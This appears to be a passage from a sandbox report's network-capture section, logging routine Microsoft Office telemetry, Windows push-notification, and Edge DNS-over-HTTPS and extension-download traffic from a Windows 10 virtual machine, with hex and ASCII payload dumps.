6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-25 23:25:38 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 73 33 4f 47 59 34 50 36 42 55 71 47 7a 39 4c 4f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 37 36 62 36 30 31 32 61 65 38 34 65 38 61 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 35 77 4f 39 68 76 62 45 4d 2b 69 53 66 45 2b 38 44 46 45 6f 61 6d 47 46 76 53 62 58 34 48 49 51 59 4b 35 45 4b 78 75 36 71 38 39 54 39 4f 4a 6e 46 63 44 4f 72 39 65 57 4d 58 41 64 56 37 4b 38 6a 69 4f 45 35 51 2f 38 52 49 4b 4a 69 65 49 72 4b 72 54 5a 4c 75 38 52 48 6d 6c 4b 50 63 2b 63 66 46 50 35 42 4f 44 44 46 6f 32 35 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: s3OGY4P6BUqGz9LO.2Context: 876b6012ae84e8ae<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAe5wO9hvbEM+iSfE+8DFEoamGFvSbX4HIQYK5EKxu6q89T9OJnFcDOr9eWMXAdV7K8jiOE5Q/8RIKJieIrKrTZLu8RHmlKPc+cfFP5BODDFo25
2024-11-25 23:25:38 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 73 33 4f 47 59 34 50 36 42 55 71 47 7a 39 4c 4f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 37 36 62 36 30 31 32 61 65 38 34 65 38 61 65 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: s3OGY4P6BUqGz9LO.3Context: 876b6012ae84e8ae<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-11-25 23:25:39 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-25 23:25:39 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 42 65 4f 57 77 46 78 69 65 6b 4f 58 61 4b 49 51 75 37 66 6f 4d 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: BeOWwFxiekOXaKIQu7foMQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.6	49785	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:38 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:39 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:38 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: 1fa1b817-401e-0067-5691-3f09c2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232538Z-174f7845968px8v7hC1EWR08ng0000000uwg0000000002ng x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:39 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.6	49814	162.159.61.3	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:38 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-25 23:25:38 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.6	49812	162.159.61.3	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:38 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-25 23:25:38 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.6	49813	162.159.61.3	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:38 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-25 23:25:38 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 61 70 69 03 6d 73 6e 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 58 00 0c 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: apimsncom)XT

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.6	49796	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:39 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:41 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:41 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: 6760f0bc-801e-002a-1f91-3f31dc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232541Z-174f7845968g6hv8hC1EWR1v2n00000002mg0000000000sy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:41 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.6	49815	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:39 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:40 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:40 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: fac49ef3-501e-008f-0a91-3f9054000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232540Z-174f7845968n2hr8hC1EWR9cag0000000u600000000004tn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:40 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.6	49816	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:39 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:40 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:40 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: cb9203b6-501e-0029-2691-3fd0b8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232540Z-174f78459685726chC1EWRsnbg0000000umg0000000002he x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:40 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.6	49817	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:40 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:40 UTC	498	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:40 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: e14f358b-d01e-007a-5d7e-3ff38c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232540Z-174f7845968zgtf6hC1EWRqd8s0000000mf00000000006fu x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-25 23:25:40 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.6	49830	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:41 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:41 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:41 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: 5cf18591-601e-000d-7e91-3f2618000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232541Z-174f7845968vqt9xhC1EWRgten0000000uq00000000002ct x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:41 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.6	49841	152.195.19.97	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:41 UTC	616	OUT	GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1733181937&P2=404&P3=2&P4=kBwAyNPu7pcbFkan0kTFxvseCBt%2b7%2bCSaJjJljLmGT89Uz5i2DoLvboBUaFvbr7TMWYC5dO7GeAMJYg1TpVAOQ%3d%3d HTTP/1.1 Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com Connection: keep-alive MS-CV: XqWy/ZttXxA73YO1qDwIGI Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 23:25:41 UTC	633	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Age: 12503672 Cache-Control: public, max-age=17280000 Content-Type: application/x-chrome-extension Date: Mon, 25 Nov 2024 23:25:41 GMT Etag: "Gv3jDkaZdFLRHkoq2781zOehQE8=" Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT MS-CorrelationId: b4b4aabf-4d02-4629-96b1-a382405b6a31 MS-CV: 642I+iNy0Qp5KFcIV/sUKh.0 MS-RequestId: 5245ac9e-0afd-43ce-8780-5c7d0bedf1d4 Server: ECAcc (nyd/D11E) X-AspNet-Version: 4.0.30319 X-AspNetMvc-Version: 5.3 X-Cache: HIT X-CCC: US X-CID: 11 X-Powered-By: ASP.NET X-Powered-By: ARR/3.0 X-Powered-By: ASP.NET Content-Length: 11185 Connection: close
2024-11-25 23:25:41 UTC	11185	IN	Data Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20 Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.6	49843	13.107.246.63	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:41 UTC	711	OUT	GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: EntityExtractionDomainsConfig Sec-Mesh-Client-Edge-Version: 117.0.2045.55 Sec-Mesh-Client-Edge-Channel: stable Sec-Mesh-Client-OS: Windows Sec-Mesh-Client-OS-Version: 10.0.19045 Sec-Mesh-Client-Arch: x86_64 Sec-Mesh-Client-WebView: 0 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 23:25:42 UTC	583	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:42 GMT Content-Type: application/octet-stream Content-Length: 70207 Connection: close Content-Encoding: gzip Last-Modified: Fri, 22 Nov 2024 21:01:12 GMT ETag: 0x8DD0B38CBCCFA90 x-ms-request-id: a7527e8d-d01e-0008-7b8d-3f7374000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241125T232542Z-174f78459684bddphC1EWRbht40000000ud0000000000215 Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-25 23:25:42 UTC	15801	IN	Data Raw: 1f 8b 08 08 18 f1 40 67 02 ff 61 73 73 65 74 00 ec bd 0b 97 db 36 b2 30 f8 57 b2 b9 33 b3 dd 89 d5 d6 5b dd d9 cd fa f4 d3 f1 f8 39 6d 3b 19 db f1 d5 01 49 48 a2 45 91 0c 1f 6a ab c3 be bf 7d 0b 05 80 00 08 50 52 db ce 77 ef b7 67 67 9c 16 09 14 0a 40 a1 50 a8 2a 14 c0 3f bf f7 93 78 16 ce bf ff e9 bb 3f bf 2f 92 25 8d a7 51 b8 0a 0b 78 ef 8d bb dd 07 df 7d 9f 92 39 9d fa 65 91 cc 66 90 38 1c f4 59 62 40 67 a4 8c 8a 69 94 f8 24 a2 d3 15 49 11 81 c7 f0 c0 df 0e 3c 00 94 97 e3 6b de f1 08 7b a5 11 7b a5 51 67 9e e1 6b 8c af 71 a7 cc f1 15 81 69 de 59 7d c6 d7 02 5f 8b 0e a5 ec d5 c7 5c 3f ef f8 b7 ec 35 20 ec 35 20 9d 60 89 af 14 5f 69 27 40 e0 19 e6 ce 48 27 c4 8a 66 21 be 86 1d 78 60 af 19 be 66 9d 19 e6 2e b0 ec 82 76 c2 08 5f 31 77 91 75 16 3c b7 c4 d7 Data Ascii: @gasset60W3[9m;IHEj}PRwgg@P*?x?/%Qx}9ef8Yb@gi$I<k{{QgkqiY}_\?5 5 `_i'@H'f!x`f.v_1wu<
